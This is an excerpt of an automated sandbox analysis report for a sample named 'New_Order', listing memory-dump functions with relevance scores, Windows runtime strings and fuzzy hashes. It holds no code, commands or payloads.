                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                • Instruction ID: 2b0027800f77355418a745634fe10d20dcc942f6ec0c8ac168569bd53483951c
                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                • Instruction Fuzzy Hash: 84C1D0312443469BEB25CF28C841B6BBBE5EFC4718F084A2DF696DB291D778E505CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                • Opcode ID: ed3e100629767a34036b713d9c9c84e0afe31868db6f72ee2cf29f2fdc906fa8
                                                                                                • Instruction ID: 5b4619f3f48ec2349eae36d9eb35472038da9faba15dd9fa09c1f2f55bb856c6
                                                                                                • Opcode Fuzzy Hash: ed3e100629767a34036b713d9c9c84e0afe31868db6f72ee2cf29f2fdc906fa8
                                                                                                • Instruction Fuzzy Hash: A9613D71E602099FDB25DFA88850BADBBB9FB54700F16403DE649EB2A1D731A940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$MUI
                                                                                                • API String ID: 0-17815947
                                                                                                • Opcode ID: 6c5343743bb62be49488ecdf73f3deca9374400450ef8296f0156abdd91cca21
                                                                                                • Instruction ID: 2611e688b19ecb55ef73f22443f418f368b93dc3623cbb050ba72784033c6ecf
                                                                                                • Opcode Fuzzy Hash: 6c5343743bb62be49488ecdf73f3deca9374400450ef8296f0156abdd91cca21
                                                                                                • Instruction Fuzzy Hash: F5510971D1062DEFDF11EFA9CC90AEEBBB9EB44758F100529E615B7290DA309E05CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0128063D
                                                                                                • kLsE, xrefs: 01280540
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                • API String ID: 0-2547482624
                                                                                                • Opcode ID: a9addc095370d8890a735bc7b4fcad747a0047120a05cc28cb4482195cc080c7
                                                                                                • Instruction ID: b3c8dd7534284848ef4926b05d132df46008e600ef5bca6e2318a6c5f75624ed
                                                                                                • Opcode Fuzzy Hash: a9addc095370d8890a735bc7b4fcad747a0047120a05cc28cb4482195cc080c7
                                                                                                • Instruction Fuzzy Hash: 2A51CF715217438FD724EF29C4406A7BBE4BF84304F14483EFA9987681E774E549CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0128A309
                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0128A2FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                • API String ID: 0-2876891731
                                                                                                • Opcode ID: 0593ecf4d8891e5417bf8f8574820535b7a0d8e433d24233c0f5de158574cd60
                                                                                                • Instruction ID: 91d17cfc2b25b076b8f5a22c444fd2d7794b1ad97942af163d89527c211020ea
                                                                                                • Opcode Fuzzy Hash: 0593ecf4d8891e5417bf8f8574820535b7a0d8e433d24233c0f5de158574cd60
                                                                                                • Instruction Fuzzy Hash: 5241B030A2564ADBDB21DF6DC444B6DBBF8FF85700F1440AAEA06DB291EBB5D900CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                • API String ID: 2994545307-4008356553
                                                                                                • Opcode ID: 3d4d9922cb3adf1af1e0ecbd1c0bd91f42e3087f9bcfca9b5b5838550e561ca0
                                                                                                • Instruction ID: 2d1c50638c52c6617f27c9ea30925c1812c0fc3b9db132f55d7a828556d4886d
                                                                                                • Opcode Fuzzy Hash: 3d4d9922cb3adf1af1e0ecbd1c0bd91f42e3087f9bcfca9b5b5838550e561ca0
                                                                                                • Instruction Fuzzy Hash: B301F4F2260700AFE321DF14CD86F667BF8E794B25F048939A648C7190EB74E904CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MUI
                                                                                                • API String ID: 0-1339004836
                                                                                                • Opcode ID: 8bdfe4ae2c9be1f3196afee6273c17ee015f65648a4c891e9c3e570087626c66
                                                                                                • Instruction ID: ae11500e50b8efdba1ff4be6ba24340a8122735d2e877524442089d14d728096
                                                                                                • Opcode Fuzzy Hash: 8bdfe4ae2c9be1f3196afee6273c17ee015f65648a4c891e9c3e570087626c66
                                                                                                • Instruction Fuzzy Hash: 62827D75E222198FEB24EFA9C880BEDBBB1FF44310F148169DA19AB2D1D7709945CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01306420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                • Opcode ID: ccfe8e6d785c846f8b94a04f190af607595c2cdf463670c76568f0b3ff13f49d
                                                                                                • Instruction ID: 716a27a4e40587701e61143127d425238d104617d8d793495001adbc4abf0948
                                                                                                • Opcode Fuzzy Hash: ccfe8e6d785c846f8b94a04f190af607595c2cdf463670c76568f0b3ff13f49d
                                                                                                • Instruction Fuzzy Hash: 0B9171B1A50219AFEB22DB99CC95FAEBBF8EF14B54F500015F600AB194D775AD00CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                • Opcode ID: f07ea88ce87d45e4c3fe4f52ff27764b9b5e923d7917ec439617a0a0f3d10f7a
                                                                                                • Instruction ID: 33416082d11801d825c3c917ea9a4bca4cce03615454a98c9d3cc6deac4c013e
                                                                                                • Opcode Fuzzy Hash: f07ea88ce87d45e4c3fe4f52ff27764b9b5e923d7917ec439617a0a0f3d10f7a
                                                                                                • Instruction Fuzzy Hash: E1919D32A00659AFDB26FBA9DC85FEFBB79EF45744F100029F605A7250E7749901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GlobalTags
                                                                                                • API String ID: 0-1106856819
                                                                                                • Opcode ID: a9180fd330f9521db2de38805214e351c7badb4b110e9a33deb14a77b87098dd
                                                                                                • Instruction ID: 13cf0d1d3a12ced7a79cb9551cd90361cc4b0ba49b77e4e0f92e63d67858d30c
                                                                                                • Opcode Fuzzy Hash: a9180fd330f9521db2de38805214e351c7badb4b110e9a33deb14a77b87098dd
                                                                                                • Instruction Fuzzy Hash: 3A717BB5E2021A9FDF28CF9CC591AADBBB2FF58700F14813EEA05A7241E7719845CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01324978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .mui
                                                                                                • API String ID: 0-1199573805
                                                                                                • Opcode ID: 371fa47bf79eaad1cb8359d40a1b38e824f6a2e70cb1ea1cde3f91fb8c219eeb
                                                                                                • Instruction ID: a98040c763e86610a58f60740f444c12af8de35d3ecd55d003826029a63b5b38
                                                                                                • Opcode Fuzzy Hash: 371fa47bf79eaad1cb8359d40a1b38e824f6a2e70cb1ea1cde3f91fb8c219eeb
                                                                                                • Instruction Fuzzy Hash: 6E51A472D1123A9BDF11EF99D940BAEBBB8AF14B58F054129EA15BB240D7349C01CBE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EXT-
                                                                                                • API String ID: 0-1948896318
                                                                                                • Opcode ID: b6185d837222bd4e84e634c5e7494c2c61e0336869d7695d0bfa1bd87dcab651
                                                                                                • Instruction ID: 9feb055189708b1a37a00bfa2d229d5cc6112e447a4322d315ce5f2c9ff26b75
                                                                                                • Opcode Fuzzy Hash: b6185d837222bd4e84e634c5e7494c2c61e0336869d7695d0bfa1bd87dcab651
                                                                                                • Instruction Fuzzy Hash: 3E41B372528342ABDB14DA79C880BBFB7E8AF98714F45092DFA84D7140E774D904C797
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                • Opcode ID: 51d5d659a237ebe27f0cadf7a164b2dcbec69f7f59229ad809730070c65d8069
                                                                                                • Instruction ID: dab637d2b27f1430995a311e7180dd196ba1a333b44a0ecf3985ea9657102c2b
                                                                                                • Opcode Fuzzy Hash: 51d5d659a237ebe27f0cadf7a164b2dcbec69f7f59229ad809730070c65d8069
                                                                                                • Instruction Fuzzy Hash: 1A4134B1D1052DABDF21DA50CC84FEEB77CAB54714F0045A9EB08AB140DB709E998FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01316B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-1885708031
                                                                                                • Opcode ID: 87048e0a8f8b95d63c81da670074017cbd8c33e8fb1506215510cc51acca81e6
                                                                                                • Instruction ID: 3de3cb63537be28950f126381f52e790e0d6dbc0b0b99ef184d02b50c9b0f096
                                                                                                • Opcode Fuzzy Hash: 87048e0a8f8b95d63c81da670074017cbd8c33e8fb1506215510cc51acca81e6
                                                                                                • Instruction Fuzzy Hash: B4314A71A007499BEF2ADBADC851BEE7BB8DF44708F10402CE941AB282C7B5D805CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: 6165af69ecde70b9892b481e57a923787b5ed3257a5660d6231f51bcb9099c8b
                                                                                                • Instruction ID: 30eb624fc6bffe3e018893ae814b7a6000cb89f4c8cc35e830ec88d559258a09
                                                                                                • Opcode Fuzzy Hash: 6165af69ecde70b9892b481e57a923787b5ed3257a5660d6231f51bcb9099c8b
                                                                                                • Instruction Fuzzy Hash: 3031D47A91051EAFEB16DB59C845E7BFB74EB80720F01413DAB05A7250E730AE14D7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0130895E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                • API String ID: 0-702105204
                                                                                                • Opcode ID: d4af6c28c49c445f4a8a0b77bd1bebbf1f7d365faf7815c2468a0f48eb953b6e
                                                                                                • Instruction ID: 24479b3b358fcad9dcd0df131aa0ee0bb872e57d454f073b7686b772a137afbb
                                                                                                • Opcode Fuzzy Hash: d4af6c28c49c445f4a8a0b77bd1bebbf1f7d365faf7815c2468a0f48eb953b6e
                                                                                                • Instruction Fuzzy Hash: BA01F7317102059BE63A7A599CA4B6A7BE9EF8535CF05045CF641165D1CB206C41C792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01322000 Relevance: .8, Instructions: 757COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 95b3f18b07973cb063346f54ef4c7986217955822df88f742c3c35b162ab2765
                                                                                                • Instruction ID: db49bc17817501b5a4206fc0aab2ec12622035cdfb1560a7a6bce0200e152f14
                                                                                                • Opcode Fuzzy Hash: 95b3f18b07973cb063346f54ef4c7986217955822df88f742c3c35b162ab2765
                                                                                                • Instruction Fuzzy Hash: DF42F3326083518FE725EF68CC80A7BBBE5BF88308F58492DFA8697250D771D945CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01318158 Relevance: .6, Instructions: 617COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 689a98b4ef03fc14684f6cb8a50d31350973fa74873effdc5f947f4c03f6a874
                                                                                                • Instruction ID: 103760b48599ee93954d0c05a3fc6b96c0e4767366bf40f9dc4f57d236ada3f6
                                                                                                • Opcode Fuzzy Hash: 689a98b4ef03fc14684f6cb8a50d31350973fa74873effdc5f947f4c03f6a874
                                                                                                • Instruction Fuzzy Hash: 13427C75E102198FEB29CF69C881BEDBBF5BF48304F188199E948EB245DB349981CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01292840 Relevance: .6, Instructions: 605COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f96caea7ff7e2f786e058bfa9bf8343c998be031d09688c102acc3c1b1277b81
                                                                                                • Instruction ID: b4964e67e09d8499eb8106f011601f9a59661078add4569edd3cc3d8bd43c8ff
                                                                                                • Opcode Fuzzy Hash: f96caea7ff7e2f786e058bfa9bf8343c998be031d09688c102acc3c1b1277b81
                                                                                                • Instruction Fuzzy Hash: FD32EE70A207568FEB24CF69C8487BEBBF2BFA4304F64411DD68A9B285D775A805CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132A118 Relevance: .6, Instructions: 591COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6990e4b69b61dc0822eebccc4e4741b8ffe973412a45795c42d44bc7d0646ee3
                                                                                                • Instruction ID: 2ce566cb61bb4894db39de969d9692f43be107abbd4487e39cd8fc2c54f03cb5
                                                                                                • Opcode Fuzzy Hash: 6990e4b69b61dc0822eebccc4e4741b8ffe973412a45795c42d44bc7d0646ee3
                                                                                                • Instruction Fuzzy Hash: 5222D0702046758FEB25EF2DC054372BBF1AF45318F18849AEA868FE86D335E452DB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01286A50 Relevance: .5, Instructions: 548COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c8e69f1cd3fe9667d212406f62f036e540eafeb54e6ff0b0bdb5930fdeac3d9b
                                                                                                • Instruction ID: 6b23b7ab7de1eb8a3358c7402dfef8d2c5cffaecb1b5c31783c8ef9412d99fce
                                                                                                • Opcode Fuzzy Hash: c8e69f1cd3fe9667d212406f62f036e540eafeb54e6ff0b0bdb5930fdeac3d9b
                                                                                                • Instruction Fuzzy Hash: B832C071A21206CFDB25DF68C480BAEBBF1FF48310F148569EA55AB391D774E851CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                • Instruction ID: 63cd75e9aa24cb41de7d6ae2058c98a6049ed1e68e179c44ac753eec3ccabd01
                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                • Instruction Fuzzy Hash: 3FF1B570E2065A9BDF15DF99C580BAEBBF5BF48304F488169EA05AB340E7B4EC41CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0131892B Relevance: .4, Instructions: 386COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5274fac0436f552022dc7560c0308144f4dcd73f431190dbce2377b15052bf51
                                                                                                • Instruction ID: bc5b03c8ac1b17565373ee4a9e73b02d6f699d581f99de2023a3705e1a8ba43c
                                                                                                • Opcode Fuzzy Hash: 5274fac0436f552022dc7560c0308144f4dcd73f431190dbce2377b15052bf51
                                                                                                • Instruction Fuzzy Hash: 8CD1F372E0060A8BDF09CF68C841AFEB7F6BF88308F1881A9D955E7245D735E901CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012865D0 Relevance: .4, Instructions: 383COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4724b65a359f435224c1a1c8e362c70141962b98a240bdec3ea34764515c2499
                                                                                                • Instruction ID: 96c54e4d5d5299083475d520f1bfca22bb17cf1d51f9850f7223458328d67d05
                                                                                                • Opcode Fuzzy Hash: 4724b65a359f435224c1a1c8e362c70141962b98a240bdec3ea34764515c2499
                                                                                                • Instruction Fuzzy Hash: 76E1A171519342CFC715EF28C090A6ABBE1FF89314F05896DEA998B391E731E905CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01278397 Relevance: .4, Instructions: 380COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93c494502d3afe8f1c7cc63024a02a53f934ed5c523b1513e6fb70dc08a5c024
                                                                                                • Instruction ID: dc2defe5c20488b925f21d7d56c7cb20aeba835885254b5c7c0b53120af45992
                                                                                                • Opcode Fuzzy Hash: 93c494502d3afe8f1c7cc63024a02a53f934ed5c523b1513e6fb70dc08a5c024
                                                                                                • Instruction Fuzzy Hash: 86D10371A2020B9FDB18DF29C895ABFB7A5FF55304F05822DEA16DB280E770D950CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01308243 Relevance: .3, Instructions: 322COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction ID: 575b83504363ac7cd84fe5f18d19939ee2d7eadc47a385a297045c7977b51a63
                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction Fuzzy Hash: 16B15274E006059FDF26DF99C990AABBBF9FF84308F1444ADAA42977D1DA34E905CB10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01290535 Relevance: .3, Instructions: 300COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction ID: f8d1de34fbb0db93f7697e2d2f9afebee105636677f250860c5a80c61b893d7d
                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction Fuzzy Hash: E2B1253162064AAFDF25DB6CC854BBEBBFABF88300F544158E652D7281DB70E941CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012883C0 Relevance: .3, Instructions: 281COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
